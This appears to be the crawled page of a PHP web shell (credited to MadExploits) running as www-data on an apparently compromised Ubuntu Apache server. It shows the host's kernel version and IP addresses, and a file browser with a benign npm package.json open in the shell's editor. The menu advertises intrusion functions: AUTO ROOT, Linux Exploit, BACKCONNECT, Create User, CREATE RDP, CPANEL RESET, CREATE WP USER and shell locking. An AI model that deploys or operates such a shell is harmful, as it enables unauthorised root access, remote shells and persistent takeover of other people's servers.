Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.71.203.21
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
get-spdx-license-ids /
[ HOME SHELL ]
Name
Size
Permission
Action
index.js
2.17
KB
-rw-r--r--
package.json
870
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "get-spdx-license-ids", "version": "2.1.0", "description": "Get an array of the latest list of SPDX license IDs from spdx.org", "repository": "shinnn/get-spdx-license-ids", "author": "Shinnosuke Watanabe (https://github.com/shinnn)", "scripts": { "pretest": "eslint --fix --format=codeframe index.js test.js", "test": "nyc --reporter=html --reporter=text node test.js" }, "license": "ISC", "files": [ "index.js" ], "keywords": [ "request", "get", "latest", "spdx", "license", "licenses", "id", "identifier", "identifiers", "json", "array", "oss" ], "dependencies": { "fettuccine-class": "^1.0.5", "inspect-with-kind": "^1.0.4" }, "devDependencies": { "@shinnn/eslint-config-node": "^5.0.0", "eslint": "^4.16.0", "nyc": "^11.4.1", "tape": "^4.8.0" }, "eslintConfig": { "extends": "@shinnn/node" } }
Close